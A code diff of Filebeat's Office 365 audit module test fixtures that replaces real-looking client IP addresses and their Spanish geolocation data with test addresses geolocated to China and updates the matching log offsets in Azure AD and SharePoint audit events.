@@ -14948,20 +14764,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -14972,8 +14786,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14988,7 +14802,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 464682,
+        "log.offset": 464496,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -15017,9 +14831,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -15112,20 +14926,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -15136,8 +14948,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -15152,7 +14964,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 469256,
+        "log.offset": 469068,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -15181,9 +14993,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -15276,20 +15088,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -15300,8 +15110,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -15316,7 +15126,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 473830,
+        "log.offset": 473640,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -15345,9 +15155,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -15440,20 +15250,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -15464,8 +15272,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment grant to user.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -15480,7 +15288,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 478404,
+        "log.offset": 478212,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -15509,9 +15317,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -15601,20 +15409,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -15625,8 +15431,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment grant to user.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -15641,7 +15447,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 482728,
+        "log.offset": 482534,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -15670,9 +15476,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -15762,20 +15568,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -15786,8 +15590,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment grant to user.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -15802,7 +15606,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 487052,
+        "log.offset": 486856,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -15831,9 +15635,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -15923,20 +15727,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log
index 1e4f08e2f593..4a19cf476566 100644
--- a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log
+++ b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log
@@ -3,8 +3,8 @@
 {"Site":"9d58b52e-2adb-4976-8c1f-9932c32a8bd2","ObjectId":"https://testsiem.sharepoint.com/sites/SIEMTest","UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","ItemType":"Web","TargetUserOrGroupName":"SIEMTest Owners","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","SiteUrl":"https://testsiem.sharepoint.com/sites/SIEMTest","Operation":"AddedToGroup","ClientIP":"","EventData":"<Group>Site Owners</Group>","Workload":"SharePoint","EventSource":"SharePoint","RecordType":14,"Version":1,"TargetUserOrGroupType":"SecurityGroup","WebId":"54cfe39c-0e16-4f8e-bd62-f2ac40248083","UserId":"app@sharepoint","CreationTime":"2020-02-17T16:59:50","UserAgent":"","CorrelationId":"4464369f-303c-b000-7cb1-c0cce4f2da18","Id":"b8c880ff-e8fe-407c-9ce9-08d7b3cacd07","UserType":0}
 {"Site":"9d58b52e-2adb-4976-8c1f-9932c32a8bd2","ObjectId":"https://testsiem.sharepoint.com/sites/SIEMTest","ItemType":"Web","UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","TargetUserOrGroupName":"SIEMTest Members","Operation":"AddedToGroup","SiteUrl":"https://testsiem.sharepoint.com/sites/SIEMTest","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","ClientIP":"","EventData":"<Group>Site Members</Group>","Workload":"SharePoint","EventSource":"SharePoint","RecordType":14,"Version":1,"TargetUserOrGroupType":"SecurityGroup","UserId":"app@sharepoint","WebId":"54cfe39c-0e16-4f8e-bd62-f2ac40248083","UserAgent":"","CreationTime":"2020-02-17T16:59:50","CorrelationId":"4464369f-303c-b000-7cb1-c0cce4f2da18","Id":"483f657f-9141-45fc-b141-08d7b3caccfb","UserType":0}
 {"Site":"9d58b52e-2adb-4976-8c1f-9932c32a8bd2","ObjectId":"https://testsiem.sharepoint.com/sites/SIEMTest","ItemType":"Web","TargetUserOrGroupName":"SHAREPOINT\\system","UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","SiteUrl":"https://testsiem.sharepoint.com/sites/SIEMTest","Operation":"AddedToGroup","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","ClientIP":"","EventData":"<Group>Site Owners</Group>","Workload":"SharePoint","EventSource":"SharePoint","RecordType":14,"TargetUserOrGroupType":"Member","Version":1,"UserId":"app@sharepoint","WebId":"54cfe39c-0e16-4f8e-bd62-f2ac40248083","CreationTime":"2020-02-17T16:59:49","UserAgent":"","CorrelationId":"4464369f-303c-b000-7cb1-c0cce4f2da18","Id":"13004a30-d15a-48a5-16ec-08d7b3caccc0","UserType":0}
-{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links","ItemType":"List","UserKey":"i:0h.f|membership|1003200096971f55@live.com","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingInheritanceBroken","ClientIP":"79.159.10.151","EventData":"<copyRoleAssignments>False</copyRoleAssignments><clearSubScopes>False</clearSubScopes>","Workload":"OneDrive","SourceRelativeUrl":"Sharing Links","EventSource":"SharePoint","ListId":"b108938d-3546-4359-925d-a1b54b4db8c2","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","Id":"dd162cd7-5df5-4fef-078a-08d7b17b4e95","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","UserType":0}
-{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"AnonymousLinkCreated","EventData":"<Type>Edit</Type>","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","UniqueSharingId":"d323b5ea-ceca-4d65-a628-e22ca9296a76","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"79.159.10.151","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9","UserType":0}
-{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","TargetUserOrGroupName":"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76","Operation":"SharingSet","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","EventData":"<Permissions granted>Contribute</Permissions granted>","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"a8c23ab8-9447-4824-3208-08d7b17b4e5e","UserType":0}
-{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","TargetUserOrGroupName":"Limited Access System Group","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"<Permissions granted>Limited Access</Permissions granted>","RecordType":14,"ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"79.159.10.151","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"88a041e3-2f3a-483c-cf76-08d7b17b4e5b","UserType":0}
-{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"<Permissions granted>System.LimitedEdit</Permissions granted>","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0}
+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links","ItemType":"List","UserKey":"i:0h.f|membership|1003200096971f55@live.com","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingInheritanceBroken","ClientIP":"216.160.83.57","EventData":"<copyRoleAssignments>False</copyRoleAssignments><clearSubScopes>False</clearSubScopes>","Workload":"OneDrive","SourceRelativeUrl":"Sharing Links","EventSource":"SharePoint","ListId":"b108938d-3546-4359-925d-a1b54b4db8c2","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","Id":"dd162cd7-5df5-4fef-078a-08d7b17b4e95","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","UserType":0}
+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"AnonymousLinkCreated","EventData":"<Type>Edit</Type>","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","UniqueSharingId":"d323b5ea-ceca-4d65-a628-e22ca9296a76","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"216.160.83.57","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9","UserType":0}
+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","TargetUserOrGroupName":"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76","Operation":"SharingSet","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","EventData":"<Permissions granted>Contribute</Permissions granted>","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"216.160.83.57","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"a8c23ab8-9447-4824-3208-08d7b17b4e5e","UserType":0}
